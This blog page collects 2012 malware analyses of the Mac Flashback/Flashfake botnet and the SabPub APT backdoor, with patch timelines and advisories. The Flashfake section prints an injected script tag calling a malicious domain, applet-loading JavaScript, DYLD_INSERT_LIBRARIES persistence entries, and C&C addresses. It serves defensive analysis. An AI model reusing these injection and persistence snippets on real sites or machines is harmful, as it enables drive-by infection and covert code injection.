Počet zobrazení stránky

Zobrazují se příspěvky se štítkemMacOS Blog. Zobrazit všechny příspěvky
Zobrazují se příspěvky se štítkemMacOS Blog. Zobrazit všechny příspěvky

čtvrtek 26. dubna 2012

OS X Mass Exploitation - Why Now?


Market share! It’s an easy answer, but not the only one.
In 2011, Apple was estimated to account for over 5% of worldwide desktop/laptop market share. This barrier was a significant one to break - Linux maintains under 2% market share and Google ChromeOS even less. This 15 year peak coincided with the first exploration by the aggressive FakeAv/Rogueware market targeting Apple computers, which we discovered and posted in April 2011 and later in May 2011, which no longer seem to be such an odd coincidence. Also, the delay in Apple malware until now most likely was not because Apple exploits were unavailable, or because the Mac OS X system is especially hardened. The 2007 "Month of Apple Bugs" demonstrated that the Mac OS X and supporting code is full of exploitable flaws. Safari, Quicktime, and other software on Apple devices is regularly exploited during pwnage contests, but widespread cybercrime attention hadn’t caught on until this past year.
At this point, we still don't know who is behind Flashfake, so we don’t know for sure that they were the same Mac OS X FakeAv/Rogueware group. Speculating that eastern euro-cybercrime is behind the botnet would be a pretty confident way to go right now. There are known groups from the region that have succeeded at wringing ad revenues from traffic hijacking. We don't believe that other sensitive data has been targeted. And the exploit distribution URLs that we are aware of have only targeted mac users. These factors limit the operational and technical needs of a financially motivated cybercrime gang.
In a sense, it would appear that their activity was somewhat similar to the Koobface or Tdss gangs. They haven't commited large unique financial crimes to attract the attention of law enforcement, and their malware contains hooks and other code to perform more sophisticated banking crime than search traffic hijacking, but they most likely were looking to make a multitude of small financial gains. On the other hand, thankfully, Apple hasn't given these guys ample notice to make their run. There can be plenty of money in that business - it is estimated that the Koobface guys ran off with millions after Facebook "outted" their operation under investigation. But based on the domain registrations we have examined, the individuals are not quite so public and they are hiding their identities while they hijack search engine traffic. The malware itself injects a number of hooks into running applications, much like the Zeus, SpyEye, and other spyware. If these were used for financial crimes, the group operating this botnet would need to organize money mules and accomplices to launder their stolen money, which would grow the group and attract the attention of other authorities.
On the technology side, Java is a big part of the puzzle. Although the Trojan is called Flashfake because users were being convinced to install the malware as an Adobe Flash update, more recent versions of the malware were being installed via client-side Java exploitation.
Three vulnerabilities were targeted with client-side exploits, none of them were 0day, which seem to have become much more difficult to come by. Besides, this set worked just as well for these operators. It is interesting to note the duration of time from the original Oracle Java security update to the Apple Java security update, and when in that timeframe the release offensive security research publicly appeared. And, when were Metasploit open source exploit modules were released targeting the related Java vulnerabilities? The windows of time may be alarming – these are not 0day exploits, but Apple simply hasn’t released patches, leaving their customers exposed to the equivalent of known 0day exploits.
2012-02-15 Oracle patches Atomic Reference Array vulnerability
2012-03-10 First Itw exploits targeting the vuln
2012-03-30 Metasploit developers add Java atomicreferencearray exploit module
2012-04-03 Apple patches their code
2011-05-12 Reported to vendor
2011-11-18 Oracle patched their Java SE
2011-11-30 Metasploit developers add "Rhino exploit" module
2011-11-30 Krebs reports operational Blackhole site with the new Java exploit
2012-3-29 Patched by Apple
"Deserializing Calendar objects"
2008-08-01 Reported to Sun with first instance of the vulnerability
2008-12-03 Sun patches their code (Sun link down)
2009-05-15 Apple patches MacOSX code
2009-06-16 Metasploit developers add Java deserialization exploit
Also on this list is a lame exploit described as a signed applet social engineering trick.
I'd prefer to call it the "the terribly confused user presented with the Java 'do you want to trust this applet?' dialog and will run anything you present them" gamble. It first became a part of the Metasploit exploit module list on 2010-01-27. Basically, these guys present the user with a file that the user thinks is a JavaUpdate provided by Apple Inc themselves, which they grant trust to perform any action on their machine. The downloader will then communicate with a couple of sites to register and download new Flashfake components. These components in turn, collect the system UUID and timestamp, then auto-generate with a crypto algorithm a set of C2 domains, along with maintaining a list of hard coded domains. A couple of the newer components inject into running processes on the system hooking software functionality and hijacking traffic, much like past TDS malware.

The anatomy of Flashfake. Part 1


What is Flashback/Flashfake?

It is a family of malware for Mac OS X. The first versions of this type of threat were detected in September 2011. In March 2012 around 700,000 computers worldwide were infected by Flashback. The infected computers are combined in a botnet which enables cybercriminals to install additional malicious modules on them at will. One of these modules is known to generate fake search engine results. It is quite possible that, in addition to intercepting search engine traffic, cybercriminals could upload other malicious modules to infected computers – e.g. for data theft or spam distribution.

The zero phase of the infection: hacked WordPress blogs

From September 2011 to February 2012, Flashfake was distributed using social engineering only: visitors to various websites were asked to download a fake Adobe Flash Player update. It meant the Trojan was being distributed as installation archives named “FlashPlayer-11-macos.pkg”, “AdobeFlashUpdate.pkg”, etc.
The use of exploits to distribute Flashfake was first detected in February 2012; exploits dating back to 2008 and 2011 were used in those attacks. Exploitation of the CVE2012-0507 vulnerability was first reported in March 2012. At that point, it was a vulnerability in Mac OS X that remained unpatched, despite the fact that Oracle had released a patch for it in February. This was because Apple never uses patches from Oracle and creates its own patches to close Java vulnerabilities. The patch for Mac OS X which closed the CVE2012-0507 vulnerability was released in early April.
This practice of releasing patches with delays of about two months is traditional for Apple.
VulnerabilityPatch from OraclePatch from Apple
CVE2008-535314 April 200915 June 2009
CVE2011-354418 October 20118 November 2011
CVE2012-050714 February 201203-12 April 2012

In order to spread Flashfake in March 2012, its authors made use of a cybercriminal partner program that appears to be of Russian origin.
The partner program was based on script redirects from huge numbers of legitimate websites all over the world. Around the end of February/early March 2012, tens of thousands of sites powered by WordPress were compromised. How this happened is unclear. The main theories are that bloggers were using vulnerable versions of WordPress or they had installed the ToolsPack plugin. Websense put the number of affected sites at 30,000 , while other companies say the figure could be as high as 100,000. Approximately 85% of the compromised blogs are located in the US.
Code was injected into the main pages when the blogs were hacked. Constructions of the following type were added to the code (example):
<script src="http://domainname.rr.nu/nl.php?p=d"></script>
As a result, when any of the compromised sites were visited, a partner program TDS was contacted. Depending on the operating system and browser version, the browser then performed a hidden redirect to sites in the rr.nu domain zone that had the appropriate set of exploits installed on them to carry out an infection.

Site code on WordPress with a link to a malicious script

The first phase of the infection: drive-by-downloads and social engineering

During hidden redirects (example: hxxp://ixeld52erlya.rr.nu/n.php?h=1&s=pmg), the browser accessed folders /3f/ or /7f/ on the malicious website and executed JavaScript which loaded a Java applet.
Here is an example of one script:
if(rts != "on"){
document.write('<applet archive="rh-3.jar" code="rhcls" width="1"
height="1"></applet>');
document.write('<applet archive="cl-3.jar" code="msf/x/AppletX"
width="1" height="1"></applet>');
}
The attack involved an attempt to execute four Jar files (Java applications). Three of these were exploits for Java vulnerabilities; the fourth was disguised as a legitimate application, with social engineering used to deceive victims.
Vulnerabilities exploited:
Each Jar file contains an exploit for one vulnerability and a malicious executable file that is extracted and installed on the system.

Code fragment in CVE2008-5353 exploit

Code fragment in CVE2011-3544 exploit

Code fragment in CVE2012-0507 exploit
If exploitation is unsuccessful, an attempt is made to infect the system using a specially crafted Java applet which tries to pass itself off as a legitimate file signed by Apple in order to get the user to grant it the rights necessary for installation.

This method of distributing Flashfake was discovered in February 2012.
The attackers rely on the user granting the application system access rights because it says it is signed by Apple. The file does not in fact have Apple’s digital signature: the certificate was forged by cybercriminals.


Fragments of code in the fake certificate
If the user agrees to grant the rights requested by the applet, a malicious file will be extracted and installed.

Fragment of code in the fake applet
Thus, the execution of any one of the four applets described above (those containing exploits or the one requesting rights from the user) in the browser will result in the installation of a container file which operates as a downloader and installer for the remaining Flashfake components.
The file is installed to /tmp/.sysenter and launched (when the exploit for CVE2012-0507 is used, a random file name is generated).

Diagram showing the first phase of the infection

Second phase of the infection: first-stage downloader

The file installed in the system is a container in Mach-O binary format, containing either a 32- or 64-bit module – both versions having practically identical functionality.
The module’s main function is to establish communication with the first-stage C&C server, download additional modules from it and install them in the system. Upon completing these functions, the module deletes itself and does not reappear on the infected system.
When it launches, the module checks if the LittleSnitch app (a popular firewall for Mac OS X), XCode (toolkit for developing OSX applications), the VirusBarrierX6.app, iAntiVirus.app, avast!.app, andClamXav.app antivirus applications, or the HTTPScoop.app and Packet Peeper.app apps are present in the system. If any of these are present, the module ceases operation and deletes itself.
Otherwise, the module connects to one of the C&C servers (e.g. 31.31.79.87, 78.46.139.211), communicates the victim computer’s UUID (universally unique identifier) and additional information about the system (version of the OS). In return, it receives a data package containing two additional components encrypted with a key based on the computer’s UUID.

Fragment of the module’s code listing the applications to check for, and the C&C URL
After the data package is loaded, the module extracts component files from it and attempts to install them in the system:

Flashfake’s operation flowchart at the current phase of the infection
The backdoor downloader is the first component to be installed. It is the main bot module responsible for ensuring further interaction with the botnet and the downloading of updates.
The installer saves the body of the backdoor with an arbitrary name (beginning with a dot, e.g. ‘.null.’) to the root partition of the user’s $HOME/ folder.
The installer also creates the file .plist (see below) to ensure the backdoor’s further operation:

Example of a .plist file
This file is installed in $HOME/Library/LaunchAgents/. This ensures that the backdoor’s module is automatically loaded each time the system is started.

Flashfake’s operation flowchart at the current phase of the infection
The second component installed from the Internet intercepts web traffic and substitutes pages in the browser.
The installation procedure for this module has changed significantly in the latest version of the Flashfake installer, which propagates via the CVE2012-0507 vulnerability. See below for a description.

Fragment of the installer’s code
The installer invokes the system function to request administrator privileges and waits for the user to insert the login and root password.

Request for administrative rights
If the user enters the required info, the installer is able to open for write the Safari.app browser application (Applications/Safari.app/Contents/Resources/) and save the module to it that intercepts traffic and substitutes pages and a second module that launches the first module in the browser process. The names of these modules are chosen randomly, but all start with a dot and end with the .png and .xsl extensions.
To ensure the modules are launched automatically, the installer modifies the contents of the file /Applications/Safari.app/Contents/Info.plist, adding the following strings to it:
<key>LSEnvironment</key>
<dict>
<key>DYLD_INSERT_LIBRARIES</key>
<string>/Applications/Safari.app/Contents/Resources/.имя_файла.xsl</string>
</dict>
If these actions are successful, the installer connects to the C&C at, for example, 31.31.79.87/stat_d/, thus notifying about the successful completion of the operation. If there is an error during installation, the connection will be made to, for example, 31.31.79.87/stat_n/.
Once these operations are completed the installer restarts the Safari browser in order to activate the modifications, ceases its operation and deletes itself from the system.
If the user does not enter the administration login and password, and presses “Cancel”, the modules will be installed using a different method.
The installer first checks the system for the following applications: MicrosoftWord.app, MicrosoftOffice 2008, Applications/MicrosoftOffice 2011, and Skype.app. If they are found, the installer ceases its operation and deletes itself from the system.
The traffic interception module is then installed to /Users/Shared/ under the name .libgmalloc.dylib.
Before this, the installer deletes files from this folder using the command rm -f /Users/Shared/.*.so. This removal operation is most probably intended to delete any earlier versions of Flashfake that are present in the system.
The installer then creates the file $HOME/.MacOS/environment.plist and saves the following strings to it:
<key>DYLD_INSERT_LIBRARIES</key>
<string>/Users/Shared/.libgmalloc.dylib</string>
As a result, the module will be hooked and loaded to every launched app.
Another auxiliary component will be installed to the user folder $HOME/Library/Application Support/ under a random name which starts with a dot and has a .tmp extension.

The operation flowchart at the installation stage of the web traffic sniffer module
Once the installation is completed, the installer connects to the C&C at, for example, 31.31.79.87/stat_u/, informing about the successful infection. After this the installer ceases its operation and deletes itself.
To be continued…

pondělí 16. dubna 2012

SabPub Mac OS X Backdoor: Java Exploits, Targeted Attacks and Possible APT link

Last week, Apple released two urgent updates to Mac OS X to:

1. Remove the Flashback malware about which we have already written
2. Automatically deactivate the Java browser plugin and Java Web Start, effectively disabling java applets in browsers

Particularly, the second step shows the severity of the CVE-2012-0507 vulnerability exploited by Flashback to infect almost 700,000 users via drive-by malware downloads.
Actually, it was the right decision because we can confirm yet another Mac malware in the wild -Backdoor.OSX.SabPub.a being spread through Java exploits.
This new threat is a custom OS X backdoor, which appears to have been designed for use in targeted attacks. After it is activated on an infected system, it connects to a remote website in typical C&C fashion to fetch instructions. The backdoor contains functionality to make screenshots of the user’s current session and execute commands on the infected machine.
Backdoor connects to remote server to fetch work


The remote C&C website - rt***.onedumb.com is hosted on a VPS located in the U.S, Fremont, CA.
Encoded C&C address (“hostname_en”) in the backdoor


“Onedumb.com” is a free dynamic DNS service. Interesting, the C&C at IP 199.192.152.* was used in other targeted attacks (known as “Luckycat”) in the past.
If we are to believe the timestamps from the Java dropper, it was created on March 16, 2012 - so almost one month ago! The dropper Java class appears to have been sent to the ThreatExpert website on April 12th.
We detect the Java exploit used in the dropper as Exploit.Java.CVE-2012-0507.bf.
One of the components of the dropper, was also sent to the multi-scanner website “VirusTotal” on April 2nd. Ever since, it was sent another time - in both cases, from China.
The Java exploits appear to be pretty standard, however, they have been obfuscated usingZelixKlassMaster, a flexible and quite powerful Java obfuscator. This was obviously done in order to avoid detection from anti-malware products.
At the moment, it is not clear how users get infected with this, but the low number and it’s backdoor functionality indicates that it is most likely used in targeted attacks. Several reports exist which suggest the attack was launched through e-mails containing an URL pointing to two websites hosting the exploit, located in US and Germany.
The timing of the discovery of this backdoor is interesting because in March, several reports pointed to Pro-Tibetan targeted attacks against Mac OS X users. The malware does not appear to be similar to the one used in these attacks, though it is possible that it was part of the same or other similar campaigns.
One other important detail is that the backdoor has been compiled with debug information - which makes its analysis quite easy. This can be an indicator that it is still under development and it is not the final version.
We are continuing our research into this malware and will post updates as necessary. In the meantime, you may want to check this article for 10 simple steps to boost the security of your Mac.

New Version of OSX.SabPub & Confirmed Mac APT attacks

Late last week, we found evidence of a possible link between a Mac OS X backdoor trojan and an APT attack known as LuckyCat. The IP address of the C&C to which this bot connects (199.192.152.*) was also used in other Windows malware samples during 2011, which made us believe we were looking at the same entity behind these attacks.

For the past two days, we have been monitoring a “fake” infected system - which is a typical procedure we do for APT bots. We were extremely surprised when during the weekend, the APT controllers took over our “goat” infected machine and started exploring it.
On Friday Apri 13, port 80 on the C&C server located at rt*****.onedumb.com and hosted on a VPS in Fremont, U.S. was closed. Saturday, the port was opened and bot started communicating with the C&C server. For the entire day, the traffic was just basic handshakes and exchanges, nothing more.
On the morning of Sunday April 15, the traffic generated by the C&C changed. The attackers took over the connection and started analysing our fake victim machine. They listed the contents of the root and home folders and even stole some of the goat documents we put in there!
Encoded communication between C&C and our fake victim
Packet above, decoded - attacker is listing folders content
We are pretty confident the operation of the bot was done manually -- which means a real attacker, who manually checks the infected machines and extracts data from them.
We can therefore confirm SabPub as APT in active stage.
On Sunday midday, the C&C domain was shutdown and the bot lost connection to it; this appears to be an initiative from the free DNS service onedumb.com and it was no doubt triggered by the media attention. Interestingly, the VPS used as the C&C is still active.
While analysing SabPub, we discovered another version of the backdoor which seems to have been created earlier. This version differs from the original one only slightly -- the hardcoded C&C address is different -- instead of the onedumb.com subdomain used by the original sample (hardcoded in the bot as “e3SCNUA2Om97ZXJ1fGI+Y4Bt”), this one simply contains the IP address of the VPS (hardcoded as “OjlDLjw5Pi4+NUAuQDBA”), meaning, it should still be operational. Its size is 42556 bytes vs 42580 for the original one.
One of the biggest mysteries is the infection vector of these attacks. Given the highly targeted nature of the attack, there are very few traces. Nevertheless, we found an important detail which is the missing link: Six Microsoft Word documents, which we detect as Exploit.MSWord.CVE-2009-0563.a. In total we have six relevant Word .docs with this verdict -- with four dropping the MaControl bot. The remaining two drop SabPub.
The most interesting thing here is the history of the second SabPub variant. In our virus collection, it is named “8958.doc”. This suggests iit was extracted from a Word document or was distributed as a Doc-file.
We performed an analysis of the same and traced its origin by the MD5 (40C8786A4887A763D8F3E5243724D1C9). The results were fascinating:
- The sample was uploaded to VirusTotal on February 25, 2012 – from two sources in the U.S.
- In both cases, the original file name was “10th March Statemnet” (yes, with the typo and without extension)
- Zero detections on VirusTotal at that time (0/40)

In case you are wondering, the name of the file (“10th March Statemnet”) is directly linked with the Dalai-Lama and Tibetan community. On March 10, 2011, the Dalai-Lama released a special statement related to Anniversary of the Tibetan People’s National Uprising Day -- hence the name.
Properties field of a document used to spread SabPub

Unfortunately there is little information in the doc files, but the Author field and the creation date are interesting. In particular, if we trust the creation date, this means the container DOC was created in August 2010 and it was updated in 2012 with the SabPub sample. This is quite normal for such attacks and we have seen it in other cases, for instance, Duqu.
We think the above facts show a direct connection between the SabPub and Luckycat APT attacks. We are pretty sure the SabPub backdoor was created as far back as February 2012 and was distributed via spear-phishing emails.
It is also important to point that SabPub isn’t backdoor MaControl (the case was described here) but still uses the same topics to trick victims into opening it. SabPub was the more effective attack because it remained undetected for almost two months!
The second variant of SabPub was created in March and the attackers are using Java exploits to infect target Mac OS X machines.
SabPub is still an active attack and we expect the attackers will release new variants of the bot with new C2s over the next days/weeks.
To summarize:
- At least two variants of the SabPub bot exist today.
- The earliest version of the bot appears to have been created and used in February 2012.
- The malware is being spread through Word documents that exploit the CVE-2009-0563 vulnerability.
- SabPub is different from MaControl, another bot used in APT attacks in February 2012; SabPub was more effective because it stayed undetected for more than 1.5 months.
- the APT behind SabPub is active at the time of writing.

Thanks to Aleks Gostev and Igor Soumenkov for the analysis.

Variant of Mac Flashback Malware Making the Rounds


Unless you have been living under a nondigital rock recently, you haveprobably heard of the Flashback Trojan, which attacks Macs. Around April 4 we saw reports of more than 500,000 infections by this malware. Further, McAfee Labs has recently come across a new variant making the rounds. This is no surprise: Whenever a piece of malware or attack is successful, we are bound to encounter copies and variations.
A key thing to remember is that this is a Trojan. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the guise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels often include email, malicious web pages, Internet Relay Chat (IRC), peer-to-peer networks, and other means. As of this writing, this Trojan is targeted at vulnerable Java plug-ins related to the CVE-2012-0507 vulnerability. When a user visits a compromised page, it often uses an iframe tag that redirects the user to another malicious page, where the actual exploit is triggered by the malicious Java applet.
OSX/Flashfake (the official detection name) is dropped by malicious Java applets that exploit CVE-2012-0507. On execution, the malware prompts the unsuspecting victim for the administrator password. Regardless whether the user inputs the password, the malware attempts to infect the system; entering the password only changes the method of infection.
The Trojan may arrive as the PKG file comadobefp.pkg and comes disguised as a Flash player installer:
It prompts the user for administrative rights:
Once the malware package is successfully installed, it tries to make contact with its remote sites to download any necessary configuration files:
Another characteristic of this malware is that it checks whether a firewall is installed on the target system. If one is found, it will remove the installation. (Other versions of Flashback are delivered via the sinkhole exploit.)
Infected users unwittingly download a variety of fake-AV packages. To avoid that fate, make sure you are running the latest security software on an up-to-date system, use a browser plug-in to block the execution of scripts and iframes, and use safe-browsing add-ons that help you avoid unwanted or suspicious websites.
My thanks go out to colleagues David Beveridge, Abhishek Karnik, and Kevin Beets for letting me pass along their analysis!

středa 4. dubna 2012

MacOS Users vulnerable to Blackhole exploit kit


UPDATE: Apple just released Java for OS X 2012-001 and Java for Mac OS X 10.6 Update 7, which addresses this vulnerability. You can download the new versions fromhttp://www.apple.com/support/downloads. More information about the release notes athttp://www.oracle.com/technetwork/java/javase/releasenotes-136954.html
If you own a MacOS computer, you might want to disable java for a while until Oracle develops a patch to solve CVE-2012-0507vulnerability, because there is a Blackhole Exploit Kit version in the wild exploiting this vulnerability and it also can be exploited using metasploit.
If you want to disable java plugins in your MacOS computer, Marcus J. Carey created a video showing how to do it.
More information about this issue at https://www.f-secure.com/weblog/archives/00002341.html
Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
Web:http://manuel.santander.name
e-mail:msantand at isc dot sans dot org